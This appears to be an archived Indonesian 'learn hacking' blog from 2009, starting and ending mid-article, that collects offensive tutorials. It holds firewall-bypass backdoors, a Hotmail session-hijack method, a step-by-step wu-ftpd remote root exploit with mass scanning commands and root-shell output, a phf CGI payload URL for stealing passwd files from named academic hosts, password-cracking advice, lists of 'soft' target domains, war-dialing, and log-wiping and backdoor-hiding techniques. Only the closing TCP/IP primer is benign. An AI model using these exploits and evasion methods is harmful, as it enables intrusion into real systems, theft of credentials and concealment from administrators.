Linux anda. Edit file /etc/inet.conf anda, dan cari entri yang berisi

smtp stream tcp nowait root

dan ubah isinya menjadi

smtp stream tcp nowait root /usr/sbin/tcpd in.telnetd

Aha. Tinggal anda reload file inetd.conf, dan kill sendmail. Sekarang port
email anda sudah siap untuk menerima koneksi telnet (bisa langsung anda
'telnet mesin.target.net 25').

Cara yang lain untuk memperoleh hasil yang sama (tanpa mengorbankan
sendmail), adalah dengan mengubah setting port penerima telnet (port 23),
dan memberitahukan mesin anda agar menerima telnet lewat port diatas 1024.
Buka file /etc/services dan cari entri yang berisi

telnet 23/tcp

dan ubah isinya menjadi

telnet 1069/tcp
(atau port lain >1024 pilihan anda).

Cara ini akan membuka jalan telnet untuk masuk lewat port 1069 tanpa
menghiraukan proteksi firewall. Tentu saja anda perlu mengulang inetd dan
sebagainya, namun anda tidak perlu membunuh mail server anda. Cara ini
tentu saja tidak terbatas ke penggunaan telnet biasa. Daemon-daemon
seperti rsh, dan secure shell daemon bisa juga digunakan untuk menerima
koneksi selain dari port defaultnya (ssh port 22).

Nah, begitu dulu sedikit penjelasan ini. Pasti diantara anda banyak yang
masih bingung atau masih mencari-cari jalan masuk ke mesin terlindung
firewall tanpa akses fisik ke target. Saran penulis adalah agar anda
mencoba-coba menjalankan program 'scanner' seperti nmap (tersedia di arsip
kecoak). Jika kebetulan mesin target anda menjalankan web server, maka
bisa juga anda coba bermain dengan port http (80), atau mencoba mencari
kelemahan di cgi-bin nya. Teknik yang lebih sukar lagi adalah fragmentasi,
dan penulis sendiri pun masih buta akan hal ini. Semoga artikel ini
bermanfaat dan ada pembaca yang bisa mengembangkan teknik-teknik lebih
baru lagi.

-JiroKul

BELAJAR HACKING : HackinG Hotmail

2009-04-27T00:25:00.000-07:00

Tulisan ini dibuat untuk para pemula, dan mereka lainnya yang selalu
pengen belajar. Ini nih mah gak buat yang udah pengalaman yang udah tau.
Kecuali emang lagi pengen baca. =-)

Artikel ini berisi informasi mengenai Hotmail free internet based e-mail dan
bagaiman untuk mendapatkan access ke semua account lainnya (Yah ... tidak
semua sih =-P ).

==================
==Latar Belakang==
==================

Hotmail adalah sebuah i-mil system berbasis web. Yang cgi-bin sebagai
sebuah gateway ke mesin-mesin lokal dimana semua password dan e-mail
di simpan.
Hotmail akan meminta kamu masukin login pada satu page dan password pada
page lainnya, Nah ini yang jadi kunci pertama dari metode buat nge'hack.
Ketika ada dalam account Hotmail, ada banyak pilihan, kayak reading mail,
deleting mail, dll
Nah pilihan terakhir adalah logout option, yang merupakan kunci kedua dari
metode nembus-in. Untuk itu kamu mesti tau user name dari subject/victim.
User name ini mah nama diawal tanda @ di alamat i-mil mereka, so
mudah aja didapat. Kamu juga musti make browser yang bisa nampilin source
code dari page yang sedang kamu liat. Yup, cuman itu yang dibutuhkan selain
subject nya mesti bloon bener, entah lupa pa gak peduli buat logout
sekali mereka udah masuk dalam system. Nah ini nih kunci buat
nge'hacknya!!!!!!
Pokoke gimana caranya supaya si-subject gak logout, terserah =-)

===========
==Caranye==
===========

Sekarang langkah-langkah buat nge-hacknya ......

langka1

Langkah pertama adalah untuk mendapatkan username dari 'subject'
trus buka web browser ke http://www.hotmail.com dan login dengan user name
itu.
Pasti-in kalo kamu udah bener nulis username soalnye hotmail gak bakalan
ngasih tauk kalo kamu ngisinya gak bener, Hotmail akan me-log IP dari orang
yang memasukkan nama login yang salah.

Langkah 2

Sekarang liat source code dari password page yang kamu masukin. Pada URL box
browser kamu bakalan keliatan seperti ini ->
www.hotmail.com/cgi-bin/password.cgi
Liat source codenya. Cari yang pada souce code page tersebut, yang kayak ini :

form name="passwordform" action="URL" method="POST" target="_top"

Nah itu tuh baris yang penting .... Nah ada sedikit cerita sedikit, sebelum
gue dilanjutin.
Sebelum ngasih tauk kamu bagaimana menggunakan satu baris tulisan pada source
code tsb, Gue ceritain sedikit mengenai teori dibalik metode nge'hack ini.
Soalnya 'gak ada artinya hacking, kalo kamu tidak tau bagaimana cara kerjanya.
don'tItulah maksud utama dari hackin', buat nyari tau bagaimana cara kerja
system.
Nah jadi ..., ketika kamu login ke hotmail, gateway cgi-bin bakalan nandai
bahwa kamu udah masuk ke systemnya.
Jadi jika kamu gak logout, dan kamu cuman ninggalin page tersebut, atawa cuman
matiin komputer-mu, system Hotmail 'gak tauk kalo kamu tuh udah 'cabut' dari
account-mu. Oke, kembali pada 'tujuan' semula.

Action "URL" pada tulisan sebelumnya merupakan lokasi dari account username.
Jadi setelah pemilik asli account udah loged in dan ngisi passwordnya
dia bakalan masuk ke page yang bunyinya URL box-nya kayak gini :

http://suatu-nomer/cgi-bin//start/username/suatu-nomer

//////////
Langkah 3
/////////

Hmmmmm...funny thing, nomer tersebut merupakan nomer yang kita liat pada
source code dari password page.
Jadi setelah kamu punya URL box, kamu musti nulis itu pada URL box aja!!!!
Kamu gak bisa buka page tersebut dengan open button, atau gunain open command
karena ini intinya tulisan ini. Jadi setelah kamu masuk ke URL tersebut,
pencet enter, dan liat aja hotmail bakalan ngasih kamu acces lengkap
atas account dari subject Hotmail.

Perlu diingat kalo nge'hack begini CUMAN bisa bekerja hanya kalo pemilik
account gak logout dari account-nya.
Dan juga, tolong punya sedikit belas kasihan pada si bloon malang di ujung
sana yang punya account, dan jangan menghapus pesan apapuns atau tindakan
nge'rusak lainnya. Be happy aja soalnya kamu UDAH bisa access ke account tsb,
abis itu tinggalin aja...

BELAJAR HACKING : Bagaimana Menggunakan (wu-ftpd) Remote EXploit Script Kiddies

2009-04-27T00:15:00.000-07:00

Bagaimana Menggunakan (wu-ftpd) Remote EXploit
Script Kiddies

Pemberitahuan :
1. Artikel ini dimaksudkan untuk bahan pelajaran para admin dan siapa
saja yang ingin mengembangkan pengetahuan networking/internet mereka.
2. Kecoak Elektronik tidak bertanggung jawab atas penyalah gunaan artikel
ini.
3. Kecoak Elektronik tetap menyertakan dan tidak menghapus Nama Penulis
eksploit/script dengan harapan pembaca juga tetap menyertakan kredit
untuk mereka, jangan mengganti nama2 penulis artikel/eksploit/script
dengan nama anda dengan harapan nanti dianggap hacker.

Akhirnya! ... setelah lama menimbang2 saya memutuskan melepas artikel ini
demi kejayaan para script kiddies ;P dan supaya script kiddies lainnya
tidak merasa bahwa cuma mereka doang yang jagoan ... hehehe.

Nah ... mulai darimana kita? ... mmm ... singkat saja remote exploit
adalah program/eksploit yang jika dijalankan dari mesin kamu dengan
sasaran server tertentu, akan mengakibatkan anda mendapatkan root shell
di mesin/server sasaran yang berarti kamu mempunyai akses root dimesin
tsb (asik ya?) ini yang disebut cracking (beberapa kiddie menyebutnya
hacking ... tapi bukan itu namanya yg benar cracking ... hehehe) dan yang
make eksploit itu disebut script kiddie :P~
BTW ... semua instruksi ini harus dijalankan di mesin linux/*nix.

A. Mass Target Scanning
Untuk bisa mendapatkan sasaran tentu saja kita harus punya daftar IP yang
akan di crack ... ya kan? ... nah daftar IP itu bisa saja berupa kumpulan
IP yang kamu sudah tahu atau punya teman2 kamu dan kamu simpan di satu
file.
Tapi untuk mudahnya kita bisa menggunakan program ADMz0ne dari ADM Crew
untuk mendapatkan daftar IP yang kita inginkan.

1. Download precompiled binary program z0ne dari site Kecoak
2. Kalau anda download precompiled jangan lupa : ~$ chmod +x z0ne
3. Misalnya kamu ingin dapat list IP dari
a. Phillipines (.ph) :
nohup ./z0ne -o ph > ph.log &
b. Site Commercial di Afrika Selatan
nohup ./z0ne -o co.za > co.za.log &
c. Dan lain-lain ... coba bereksperimen dengan domain
Note : nohup dan & di awal dan akhir perintah adalah untuk
membackground proses scanning, ketik : man nohup kalo ingin tahu
lebih banyak.
4. Untuk contoh ini misalnya anda berhasil mendapatkan list IP dari
Phillipines (.ph) dan disimpan di file ph.log
Isinya kira2 seperti berikut ini :
~$ cat ph.log
210.23.230.195
210.23.234.33
210.23.234.65
210.23.230.193
203.167.64.2
203.167.64.3
---dst---

B. Scanning server yang mempunyai wufptd hole

1. Download precompiled binary program wu-scan dari site Kecoak
2. Atau anda bisa download source nya wu-scan.c kemudian compile:
gcc -o wu-scan wu-scan.c
3. Kalau anda download precompiled jangan lupa : ~$ chmod +x wu-scan
4. Scan IP list yang sudah didapat sebelumnya (ph.log)
nohup ./wu-scan ph.log &
5. Hasil akhirnya akan dituliskan di file wu-scan.log
Hasilnya kira2 seperti ini :

210.23.234.42: wu-2.6.0(1)
203.176.29.195: wu-2.6.0(1)
208.160.224.133: Vulnerable wu-2.6.0(1) running on RH 6.2

IP yang bisa di crack adalah yang ada tulisan Vulnerable blah ;)
Untuk mudahnya kamu bisa menaruh IP yg vulnerable di satu file lain
misalnya ph.vul
~$ cat wu-scan.log | grep Vulnerable > ph.vul

C. Cracking ... let's party!

1. Download precompiled binary program wuftpdsp dari site Kecoak
2. Atau anda bisa download source nya wuftpdsp.c kemudian compile:
gcc -o wuftpdsp wuftpdsp.c
3. Kalau anda download precompiled jangan lupa : chmod +x wuftpdsp
4. Untuk me-remote exploit 208.160.224.133 ketik :
./wuftpdsp -s0 -t 208.160.224.133

--- ini yg akan keliatan di layar ---
Target: 208.160.224.133 (ftp/): RedHat 6.2 (?) with wuftpd
2.6.0(1) from rpm
Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152

loggin into system..
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS
230 Guest login ok, access restrictions apply.
STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04]
STEP 3 : Checking if we can reach our return address by format string
STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now)
STEP 5 : Sending code.. this will take about 10 seconds.
Press ^\ to leave shell
blah ...
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
--- habis ---

6. Kamu bisa coba beberapa perintah standar seperti ls :P~ di root shell
kamu yang baru, atau perintah lain yang agak bermanfaat ;) seperti
cat /etc/passwd dan cat /etc/shadow
7. Dan seperti pesan nya tekan CTRL dan \ kalau ingin keluar dari root
shell (dan kembali ke shell di mesin kamu sendiri.
8. Selain itu? kan ada trojan/backdoor dll, begitu mungkin kamu bertanya
ehm ... ikuti saja Script Kiddies Tutorial berikutnya dan menjauhlah
dari masalah ... OK?

D. wu-ftpd eksploit lain.
Buat yang masih penasaran dengan hasil wuftpdsp, coba gunakan wu-ftpd
eksploitnya TESO Team - 7350wu
Cara pakainya kamu cari sendiri ... anggap saja PR.

BELAJAR HACKING : INSTANT SHELL UNIX

2009-04-27T00:11:00.000-07:00

Berikut adalah cara mendapatkan shell unix dalam waktu cepat buat kamu yang pingin belajar
sambil praktek tapi nggak mampu beli/install UNIX dengan memanfaatkan eksploit yang udah
cukup uzur cuman masih lumayan ampuh.

Bahan-bahan yang diperlukan:

- Web Browser (Netscape 3.0 disarankan karena cepat)
- Program Cracker (gunakan crackerjack atau star cracker)
- Daftar kata (Wordlist/Dictionary). Favorit gue sih GlobalKOS KOSdict.
Sekitar 11.2 MB uncompressed!
- Komputer UMUM (yang nggak bisa di-trace)
- Komputer nganggur (sekitar 6 jam untuk file passwd ukuran medium). untuk yang satu ini nggak
mesti umum punya sebab fungsinya hanya untuk meng-crack

Prakteknya:

- Jalankan browser di komputer umummu (perpustakaan, rental)
- buka window baru (kita sebut window #2)
- dari window lama (window #1) jalankan altavista
- cari target-target potensial. Untuk yang satu ini penjelasan sedikit:

Target yang paling empuk adalah site-site akademis. Paling lezat kalau site-site akademis tsb
terletak di luar negeri. Paling yahud yang ada di negeri yahudi (israel) sebab Indonesia dan israel
tidak punya hubungan diplomatik maupun perjanjian deportasi. JANGAN coba-coba mengehack server milik
pemerintah Indonesia! Kalian nggak akan mendapat ampun! Nah, jika kamu sudah punya sesuatu dalam
pemikiran, contoh: site-site akademis di israel (domain= ac.il) maka

- di altavista, ada kolom yang berjudul "Search the web for ..." kamu isi
dengan: host:ac.il , lalu pilih "search"
- altavista akan menampilkan daftar server server yang memenuhi kriteria search kamu. modifikasi
sekeinginan hati. contoh: Untuk mendapatkan daftar target dari domainnya universitas Tel Aviv,
ketik host:tau.ac.il kamu akan dapetin nama nama webserver yang ada di sono. jadi kira-kira
akan muncul webpage dari server yang namanya www.tau.ac.il, www.cs.tau.ac.il dll. kalo kamu ngisi
host:co.jp maka yang akan ditampilin adalah host-host komersial di jepang (dlsb)
- pergilah ke Window #2. di kolom: "Location:" ketiklah:
http://nama.target.kamu/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd
jangan lupa mengganti nama target dengan salah satu site yang terdapat di daftar sites kamu
dari window #1 contoh:
http://eris.wisdom.weizmann.ac.il/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd

(percuma ngegunain host yang ada di contoh, file passwdnya kecil banget!)

- Kemungkinan ada empat:
1. Error message ... (dalam kasus ini, maka cukup kembali ke daftar target dan coba
target berikutnya.
2. Smile, you're on candid camera! (dalam kasus ini, informasi mengenai kamu direkam, nomor
ip dicatat dan akan disimpan di server! Hati-hati sebab kamu udah di-log, dan bisa di-trace!
Karena itu pakailah kondom dan gunakan KOMPUTER UMUM! dalam kasus ini kamu cuman bisa
ngusep-ngusep dada aja, deh!)
3. muncul tulisan yang menyerupai bentuk dibawah:
root:*:0:0:System Administrator:/:/bin/csh
sysadm:*:1:1: Bokeph Memendez:/usr/adm:/bin/bash dll dll.

perhatikan bahwa setelah tanda titik dua yang pertama, SELALU muncul tanda asterisk (*).
ini artinya kamu berhasil mendapatkan file passwd hanya saja sayangnya sang file sudah di-shadow
(nggak bisa dibaca oleh sembarang orang, perlu pangkat ROOT (tuhan) untuk ngebacanya!) Well, terpaksa
lanjutkan ke daftar target berikutnya ....

4. muncul tulisan yang menyerupai bentuk dibawah:
root:OUk9b8RqMRVNs:0:0:root,,,,,,,:/:/bin/csh
sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh
diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh
leonid:F5AymuqmXVFCU:1399:8:Leonid Bebek:/usr/leonid:/bin/tcsh dll dll.

(Dalam kasus ini : CREEET! Dapet deh tuh file passwd asli! tanpa shadow!)

- Nah segera setelah file passwd didapatkan, "Save As" dan simpan di tempat yang aman!
- Terserah boleh kalo mau lanjutin ke target berikut atau segera meng-crack
- pastikan komputer untuk nge-crack aman dan bisa dibiarin nganggur selama berjamjam atau kalo
file passwdnya emang besar, berhari hari.
- jalankan program crack, gunakan wordlist atas file passwd yang baru kamu panen.
- kalo udah berhasil nge-crack, kamu udah siap untuk memakai shell unix 'baru' mu!
telnet aja ke servernya (jangan lupa pake komputer umum atau gunakan perlindungan (phreak dulu
teleponnya, login ke isp pake punya orang, dll!!!)). Isi dengan login dan passwd yang baru kamu
crack, silakan lihat-lihat sekitar. Kalo ada info menarik, jangan lupa dibagi-bagi!

Jika kamu ingin mengeksploitasi, coba jalankan eksploit-eksploit yang ada untuk mendapatkan root!

Gimana? Gampang khan? kalo enggak bisa, sih , kebangetan banget! Gitu dulu deh! Semoga ada manfaatnya!

Catatan PENTING:
JUNJUNGLAH ETIKA HACKER!!!! Jangan merusak!!! Jika kamu berhasil masuk (dan mendapatkan root).
Jangan, sekali lagi JANGAN jalankan perintah/program apapun yang kamu tidak tahu apa efeknya.
Pelajari bukumu, jalankan perintah-perintah sesuai petunjuk buku. JANGAN coba-coba menjalankan
eksploit tanpa tahu asal usul maupun pengertian mendalam tentang UNIX. Tulisan ini gue tulis dengan
maksud supaya kamu bisa mendapatkan sarana untuk belajar UNIX sebab gue percaya bahwa keinginan untuk
belajar tidak sepantasnya dihalangi oleh faktor ekonomi.

Catatan 1:
File passwd yang kamu dapat masih dalam bentuk terenkripsi, jadi kalo
dilihat:

root:2/.,1wEYqm3m3Q:Root Account:/:/bin/csh
| |
nama account |
password terenkripsi/tersandi

cara kerja program cracker adalah kurang lebih seperti ini:

1. baca kata #1 dari file kamus/wordlist
2. enkripisi dengan algoritma DES
3. baca baris 1 dari file passwd (account 1), baca nama account dan passwd terenkripsi
4. bandingkan apakah kata#1terenkripsi = passwd1terenkripsi
5. ya? beritahukan user/catat di log, tidak? baca baris2 file passwd, then.

catatan 2:
domain domain yang terkenal empuk:
ac.jp (akademis jepang)
ac.kr (akademis korea)
.edu (akademis amrik)
ac.uk (akademis inggris)
go.kr (pemerintah korea)
go.in (pemerintah india)
ac.ir (akademis iran)
com.il (komersil israel) dll dll.

BELAJAR HACKING :Skanning Massal Bagian 1 (WarDialing)

2009-04-27T00:06:00.000-07:00

Salah satu aspek yang paling menarik (dan seringkali menelan banyak waktu)
dalam serangan terhadap suatu network adalah tahap "pencarian", atau
pengenalan atas network tersebut. Artikel ini saya beri judul "Skanning"
sebab saya tidak bisa menjumpai ekuivalen dari kata "scan" atau "probe"
dalam bahasa Indonesia. "Scanning", sebagai metode untuk menemukan saluran
komunikasi yang bisa dieksploit sebenarnya bukanlah barang baru. Ide
pokoknya adalah untuk menelaah sebanyak mungkin saluran, dan menyimpan
hasilnya (saluran yang bisa dieksploit, tergantung dari keperluan anda).
Dalam bidang periklanan, hal ini adalah penyumbang terbesar dalam
metodologi mereka (tebarkan iklan sebanyak mungkin, dan pasti ada aja
seseorang yang bisa di-'eksploit' lebih lanjut) - termasuk "mass spamming"
dan lain sebagainya.

WarDialing
----------
"Scanning" memasuki dunia hacking/phreaking bersamaan dengan masuknya era
sistem telepon terkomputerisasi. Coba saja bayangkan, kita sudah mempunyai
sebuah jaringan global, semua bisa dicapai melalui nada dan kode telepon
kita. Dan di sebuah lokal, bisa terdapat jutaan nomor, namun mungkin yang
akan membuat kita benar-benar tertarik hanyalah sekitar 1 persen dari
seluruh nomor tersebut, mungkin nomor-nomor tersebut adalah kelompok nomor
yang menjawab panggilan dengan nada "carrier" (untuk mendengar contoh nada
'carrier' coba saja telepon langsung nomor telepon ISP anda). Solusi logis
dari permasalahan menjumpai nomor 'carrier' tersebut adalah tentu saja
dengan mencoba mendial sebanyak mungkin nomor untuk mengetahui nomor-nomor
mana saja yang merespon dengan 'carrier'. Dari sinilah aspek "war-dialing"
lahir. Pada prinsipnya, kita bisa dengan mudah menginstruksikan modem kita
untuk mendial banyak nomor dengan sedikit pengetahuan dasar dalam
instruksi standar modem. Lihat program singkat dibawah (ditulis dalam
batch language untuk DOS):

set port=1
set number1=3160000
set number2=3160001
set number3=3160002

cls
echo Mengaktifkan modem
echo ATDT>COM%port%
choice /c:ync /t:n,2
echo H1>COM%port%
choice /c:ync /t:n,2
cls
echo Mengaktifkan Modem
echo ATDT>COM%port%
choice /c:ync /t:n,2
echo H1>COM%port%
choice /c:ync /t:n,2

echo ATDT %number1% >COM%port%
echo H1 >COM%port%
echo ATDT %number2% >COM%port%
echo H1 >COM%port%
echo ATDT %number3% >COM%port%
...

prototipe program diatas akan secara berurutan mendial nomor telepon
3160000 sampai 316xxxx tergantung selera anda. Jelas program tersebut
masih sangat sederhana dan tidak mempunyai kemampuan menyimpan nomor mana
saja yang menjawab dengan carrier. Idenya sederhana: dial sebuah nomor,
jika modem menjawab dengan CONNECT, simpan nomor tersebut, dan lanjutkan
ke nomor berikutnya, dan seterusnya. Program-program WarDialing banyak
bertebaran di Internet, yang terkenal adalah CatCalls dan ToneLoc,
keduanya bisa di-download dari arsip kecoak. direktori
/eksploit/fonedialer.

Aplikasi WarDialing
-------------------
Tentu saja kamu bisa menginstruksikan komputermu untuk mendial seluruh
nomor dari 000-0000 sampai 999-9999, tapi bayangkan berapa banyak waktu
yang diperlukan. Untuk mereka yang cermat, solusinya jelas, untuk
memperpendek rentang nomor yang ditargetkan. Untuk menjumpai nomor-nomor
potensial yang bisa ditargetkan biasanya digunakan sedikit guide seperti:

1. Coba perusahaan besar atau institusi pemerintah
2. Lihat di buku telepon nomor yang mereka punyai
3. Karena biasanya perusahaan atau institusi pemerintah mempunyai blok
nomor sekaligus (Contoh, misalnya target kamu adalah BPPT, dan lihat bahwa
nomor-nomor telepon kantor mereka berkepala 314, 315, dan 316, maka bisa
dicoba mulai dari 314-0000 sampai 316-9999).
4. Ingatlah bahwa kamu hanya masih dalam tahap 'meraba-raba', jadi ada
kemungkinan modem kamu bertemu dengan manusia biasa, mesin penjawab
telepon, mesin faksimil, bermacam-macam PBX atau PABX, bermacam-macam
sistem komputer lain, dan banyak lagi kemungkinan). Dari semua nomor yang
direkam oleh ToneLoc/CatCall sebagai 'carrier tone', perlu kamu konfirmasi
secara manual apa sebenarnya yang menjawab. Ada kemungkinan (besar) kamu
bertemu sebuah prompt untuk sistem tertentu, cari informasi lebih lanjut
tentang sistem tersebut lewat internet (coba lihat apakah ada eksploitnya,
siapa pembuatnya, dll). Untuk daftar prompt-prompt yang familiar, lihat
lagi artikel HackingFAQ kecoak di edisi #1.

Catatan Akhir
-------------
Sampai disini dulu artikel scanning ini. Satu kata peringatan adalah agar
pembaca semua menerapkan kehati-hatian (seperti anonimitas, dll) dalam
eksplorasi ini. Jangan takut untuk mencoba, tapi tetaplah berhati-hati.
Jangan lupa baca artikel berikutnya mengenai scanning melalui TCP/IP.

-JiroKul

Siluman Dalam UNIX: Teknik-teknik dasar antideteksi

2009-04-27T00:01:00.000-07:00

Siluman Dalam UNIX: Teknik-teknik dasar antideteksi

Dengan semakin banyaknya diantara kita semua yang berhasil mendapatkan
account di server-server UNIX seantero dunia, mungkin ada baiknya kita
pelajari teknik-teknik menyembunyikan diri. Tujuannya jelas, pasti suatu
saat kamu pingin 'naik kelas' dan mengalihkan sasaran bukan hanya ke ac.jp
atau or.jp lagi (yang memang sysadmin2nya pada ceroboh). Cara-cara dibawah
ditulis dengan asumsi bahwa kamu telah berhasil mendapatkan 'root'.
Program-program yang disebut di dalam teks ini bisa anda dapatkan lewat
arsip kecoak. Shout outs to k-elektronik dan para op di #IndoHack (gelo)
dan #IndoSex >:)

Yang jelas-jelas
----------------
- sedapatnya gunakan selalu terminal umum / anonimus
- sebelum melogin, ada baiknya koneksi di-bounce dulu beberapa kali lewat
wingate
- jangan menyerang target yang jelas-jelas berbahaya
- jangan tinggalkan file-file seperti .rhoshts dan hosts.equiv di sistem
sasaran
- jangan ganggu atau ubah isi file /etc/passwd, jangan tambahkan account
baru. Jika kamu perlu akses, silakan ambil file ini, simpan dan jalankan
crack. Setelah itu login dengan username biasa, dan untuk mendapatkan
root, gunakan eksploit lokal (baca artikel mengenai jenis-jenis eksploit
di kecoak).
- saat menambahkan "/bin/sh" ke inetd.conf, coba untuk menyembunyikannya
sedikit (jangan terang-terangan menambahkan /bin/sh - coba gunakan
perintah 'ln' ke file lain yang namanya tidak mencurigakan).
- jika kamu ingin telnet atau ftp out, jangan langsung mengetikkan
parameter nama host di command prompt. Cukup ketikkan 'telnet' atau 'ftp',
lalu di prompt telnet (atau ftp) ketikkan 'op [nama.host.target.net]'.
Dengan cara ini jika sysadmin ingin melihat apa yang sedang dikerjakan
oleh seluruh user (dengan 'ps -aux'), yang nampak hanyalah login dan nama
proses (telnet). Untuk menghindari kecurigaan jika kamu menggunakan sang
sistem sebagai launchpad (admin manapun bakalan tegang ngelihat user biasa
yang nama prosesnya 'telnet abri.mil.id').

File-file log
----------------
Hampir semua sistem mempunyai petunjuk path untuk file-file log ini di
/etc/syslog.conf. Silakan periksa file ini (gunakan 'find' atau 'which'),
catat lokasi file-file log, dan silakan kamu telaah isinya. Modifikasi
secukupnya. Pada beberapa sistem, dengan menggunakan 'tail' bisa kamu
lihat apakah kamu (baik nama login, maupun host kamu) tercatat di file
log. * JANGAN * hapus file-file log ini. Sang sysadmin akan dengan segera
mengetahui keberadaanmu! Cara cepat untuk menghilangkan jejak adalah jelas
dengan menggunakan perintah 'grep':

# cat syslog | grep -v "attacking.host.com" > syslog

Apa akibat dari perintah ini? Misalkan kamu dicatat me-log-in dengan host
asal attacking.host.com, dan log sistem akan mencatat "Connected … from
attacking.host.com". Nah perintah diatas akan menghapus seluruh baris
entri file syslog yang memuat nama host kamu. Ingatlah agar * hanya *
menghapus entri yang bisa dihubungkan denganmu, jadi jangan utak-utik
entri-entri lain.

File-file utmp dan wtmp
--------------------------
utmp dan wtmp adalah file-file yang bertugas untuk mencatat data login.
utmp menyimpan informasi mengenai siapa saja yang sedang ter-log-in
(misalnya saat kamu menjalankan perintah "who"). File wtmp menyimpan data
para pengguna yang pernah memakai sistem, dan informasi berapa lama
pengguna tersebut ter-log-in (seperti saat kamu menjalankan perintah
"last"). Hampir setiap sysadmin akan mengandalkan kedua file ini sebagai
langkah pertama dalam kasus pembobolan. * JANGAN * menghapus file-file
utmp dan wtmp, sama seperti di atas, hilangnya file ini akan memancing
perhatian sang sysadmin. Gunakan program-program seperti zap.c atau zap2.c
(mungkin tidak bisa jalan di beberapa sistem tertentu). Atau bisa kamu
pelajari perintah 'dd' untuk merekonstruksi file log ini, dengan syarat
kamu harus memahami ukuran tepat struktur file utmp di sistem tersebut.

File-file history
-----------------
Yang ini boleh kamu hapus. Tergantung dari jenis shell dan variabel ENV
yang kamu gunakan, jalankan perintah 'rm $HOME/.history' atau 'rm
$HOME/.bash_history'. Jalankan 'setenv' untuk melihat lokasi HISTFILE.

Lain-lain
---------
Jika kamu berhasil mendapatkan shell berprivilese root, pastikan bahwa
kamu mengganti namanya dengan sesuatu yang tidak mencurigakan, dan jangan
simpan shell ini di direktori home milik user. Sembunyikan bersama
file-file binaries ber-suid lainnya.

Jangan mengubah-ubah file konfigurasi, file-file webpage, dan sebagainya.
Usahakan merubah sesedikit mungkin. Jika kamu hanya ingin 'sekali pukul'
(seperti membajak situs web tanpa meninggalkan jejak), silakan ubah
file-file webpage, dan pastikan syslog, utmp, dan wtmp tidak mencatat
kehadiran kamu.

Jika kamu memasang sniffer ethernet, harap diingat bahwa driver ethernet
yang kamu gunakan akan tetap bisa diperhatikan oleh sang sysadmin.

Sebagai penutup: gunakan akal dan imajinasi kamu. Bayangkan dirimu sebagai
seorang admin. Antisipasi gerak-gerik sang admin, tempatkan selalu kata
'paranoid' di otak kamu, gunakan backdoor-backdoor yang kreatif dan sulit
ditemukan. Selamat nge-hack, dan jangan lupa bagi-bagi hasil!

BELAJAR HACKING : Konsep Dasar TCP/IP

2009-04-26T23:40:00.000-07:00

========================================================================

TCP/IP merupakan dasar dari segalanya, tanpa mempelajari TCP/PI
kemungkinan kita tidak dapat melakah maju di dunia pehackingan. Dengan
kata lain, TCP/IP merupakan awal dari segalanya. Banyak orang yg
menyepelekan pentingnya mempelajari TCP/IP, mereka mengaku dirinya
"hacker" tetapi tidak mengerti sama sekali apa itu TCP/IP. Merasa hacker
hanya apabila bisa mencrash ataupun menjebol server, tetapi sebetulnya
bukan itulah maksud dari segala itu. Hacker itu adalah orang yg haus
akan pengetahuan, bukan haus akan penghancuran. Untuk menjadi hacker
dibutuhkan kerja keras, semangat, motivasi yg tinggi serta pemahaman
seluk-beluk internet itu sendiri, tanpa hal-hal tersebut mustahil anda
dapat menjadi seorang hacker yang tangguh.

Tulisan ini didedikasikan terutama untuk member Kecoak Elektronik dan
siapa saja yang ingin mempelajari TCP/IP, bukan untuk mereka yang hanya
ingin mencari jalan pintas menjadi hacker sejati. Bagi anda yg memang
udah profhacking mungkin tulisan ini tidak penting, karena memang
tulisan ini hanyalah pengantar belaka dan bukan merupakan referensi yg
sempurna (dan jauh dari sempurna) oleh karenanya hanya dikhususkan bagi
mereka yg pendatang baru (newbies).

1. Apa itu TCP/IP ?
-------------------
TCP/IP adalah salah satu jenis protokol* yg memungkinkan kumpulan
komputer untuk berkomunikasi dan bertukar data didalam suatu network
(jaringan).

************************************************************************
Merupakan himpunan aturan yg memungkinkan komputer untuk berhubungan
antara satu dengan yg lain, biasanya berupa bentuk / waktu / barisan /
pemeriksaan error saat transmisi data.
***********************************************************************
2. Apa yg membuat TCP/IP menjadi penting ?
------------------------------------------
Karena TCP/IP merupakan protokol yg telah diterapkan pada hampir semua
perangkat keras dan sistem operasi. Tidak ada rangkaian protokol lain yg
tersedia pada semua sistem berikut ini :

a. Novel Netware.
b. Mainframe IBM.
c. Sistem digital VMS.
d. Server Microsoft Windows NT
e. Workstation UNIX, LinuX, FreeBSD
f. Personal komputer DOS.

3. Bagaimana awalnya keberadaan TCP/IP ?
----------------------------------------
Konsep TCP/IP berawal dari kebutuhan DoD (Departement of Defense) AS
akan suatu komunikasi di antara berbagai variasi komputer yg telah ada.
Komputer-komputer DoD ini seringkali harus berhubungan antara satu
organisasi peneliti dg organisasi peneliti lainnya, dan harus tetap
berhubungan sehingga pertahanan negara tetap berjalan selama terjadi
bencana, seperti ledakan nuklir. Oleh karenanya pada tahun 1969
dimulailah penelitian terhadap serangkaian protokol TCP/IP. Di antara
tujuan-tujuan penelitian ini adalah sebagai berikut :

1. Terciptanya protokol-protokol umum, DoD memerlukan suatu protokol yg
dapat ditentukan untuk semua jaringan.
2. Meningkatkan efisiensi komunikasi data.
3. Dapat dipadukan dengan teknologi WAN (Wide Area Network) yg telah
ada.
4. Mudah dikonfigurasikan.

Tahun 1968 DoD ARPAnet (Advanced Reseach Project Agency) memulai
penelitian yg kemudian menjadi cikal bakal packet switching . Packet
switching inilah yg memungkinkan komunikasi antara lapisan network
(dibahas nanti) dimana data dijalankan dan disalurkan melalui jaringan
dalam bentuk unit-unit kecil yg disebut packet*. Tiap-tiap packet ini
membawa informasi alamatnya masing-masing yg ditangani dengan khusus
oleh jaringan tersebut dan tidak tergantung dengan paket-paket lain.
Jaringan yg dikembangkan ini, yg menggunakan ARPAnet sebagai tulang
punggungnya, menjadi terkenal sebagai internet.

Protokol-protokol TCP/IP dikembangkan lebih lanjut pada awal 1980 dan
menjadi protokol-protokol standar untuk ARPAnet pada tahun 1983.
Protokol-protokol ini mengalami peningkatan popularitas di komunitas
pemakai ketika TCP/IP digabungkan menjadi versi 4.2 dari BSD (Berkeley
